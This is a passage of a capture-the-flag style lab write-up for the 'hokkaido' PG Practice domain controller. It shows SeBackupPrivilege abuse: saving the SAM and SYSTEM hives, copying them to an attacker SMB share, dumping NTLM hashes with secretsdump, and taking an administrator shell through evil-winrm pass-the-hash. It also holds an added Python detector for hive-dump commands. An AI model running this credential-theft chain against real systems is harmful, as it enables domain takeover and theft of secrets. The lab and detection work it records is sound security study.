SeBackupPrivilege and SeRestorePrivilege
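The current user, molly.smith, is a member of the privileged Server Operators group, which grants both SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege allows reading files and registry keys regardless of their ACLs, which is why a non-administrator can save the SAM and SYSTEM hives below.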
Registry Hives
PS C:\tmp> reg save HKLM\SAM sam
The operation completed successfully.
PS C:\tmp> reg save HKLM\SYSTEM system
The operation completed successfully.
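Seen from the defender's side, the two reg save commands above are a high-signal pattern in process-creation logs (Security event 4688 with command-line auditing, or Sysmon event 1). The following is an added example, not part of the original write-up: it flags root-hive saves of SAM, SYSTEM and SECURITY and raises an alert when one account takes both SAM and SYSTEM on the same host, since the SAM hashes are only usable together with the boot key from SYSTEM. The event field names, the 10-minute window, the timestamps, and the WS01, backup-svc and helpdesk entries are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Root hives whose offline copies expose credentials: SAM + SYSTEM (boot key), SECURITY (LSA secrets).
SENSITIVE = {"SAM", "SYSTEM", "SECURITY"}
# Matches reg / reg.exe (optionally quoted full path) saving or exporting a whole HKLM root hive.
HIVE_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+(save|export)\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(\w+)"?(?=\s|$)',
    re.IGNORECASE,
)

def hive_dumps(events):
    """Return sorted (time, host, user, hive) tuples for each sensitive root-hive save/export."""
    hits = []
    for ev in events:
        m = HIVE_RE.search(ev["cmdline"])
        if m and m.group(2).upper() in SENSITIVE:
            hits.append((datetime.fromisoformat(ev["time"]), ev["host"],
                         ev["user"].lower(), m.group(2).upper()))
    return sorted(hits)

def credential_dump_alerts(events, window=timedelta(minutes=10)):
    """Alert once per (host, user) that saved both SAM and SYSTEM within `window`."""
    alerts, last_seen = [], {}
    for when, host, user, hive in hive_dumps(events):
        seen = last_seen.setdefault((host, user), {})
        seen[hive] = when
        # SAM alone is not enough to recover hashes; the pair is the signal.
        if ({"SAM", "SYSTEM"} <= seen.keys()
                and abs(seen["SAM"] - seen["SYSTEM"]) <= window
                and (host, user) not in alerts):
            alerts.append((host, user))
    return alerts

# Constructed sample events (field names and values are assumptions, not real logs).
EVENTS = [
    {"time": "2025-01-10T09:14:02", "host": "DC", "user": r"HAERO\molly.smith",
     "cmdline": r"reg save HKLM\SAM sam"},
    {"time": "2025-01-10T09:14:20", "host": "DC", "user": r"HAERO\molly.smith",
     "cmdline": r"reg save HKLM\SYSTEM system"},
    {"time": "2025-01-10T11:00:00", "host": "WS01", "user": r"HAERO\backup-svc",
     "cmdline": r'"C:\Windows\System32\reg.exe" EXPORT "HKEY_LOCAL_MACHINE\SYSTEM" D:\bk\system.reg'},
    {"time": "2025-01-10T11:05:00", "host": "WS01", "user": r"HAERO\helpdesk",
     "cmdline": r"reg save HKLM\SYSTEM\CurrentControlSet\Services svc.hiv"},
    {"time": "2025-01-10T12:00:00", "host": "WS01", "user": r"HAERO\helpdesk",
     "cmdline": r"reg query HKLM\SAM"},
]

if __name__ == "__main__":
    for host, user in credential_dump_alerts(EVENTS):
        print(f"ALERT {host}: {user} saved both SAM and SYSTEM hives")
```

Subkey saves and read-only queries are deliberately ignored, so routine troubleshooting does not fire the rule; a lone SYSTEM export is recorded as a hit but does not alert on its own.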
Exfiltrating SAM and SYSTEM
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ simplesmb . -smb2support -username molly.smith -password qwer1234
PS C:\tmp> copy .\sam \\192.168.45.235\smb\
PS C:\tmp> copy .\system \\192.168.45.235\smb\
Transfer complete
Hashdump (Local)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-secretsdump local -sam ./sam -system ./system
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
NTLM hash of the DA: Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Hashdump (Domain)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-secretsdump HOKKAIDO-AEROSPACE.COM/administrator@dc.hokkaido-aerospace.com -k -hashes :d752482897d54e239376fddb2a2109e4 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
[*] DPAPI_SYSTEM
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Shelldrop
AV
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ evil-winrm -i dc.hokkaido-aerospace.com -u administrator -H d752482897d54e239376fddb2a2109e4
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
haero\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::6467:326:cc38:9299%6
IPv4 Address. . . . . . . . . . . : 192.168.119.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.119.254
System level compromise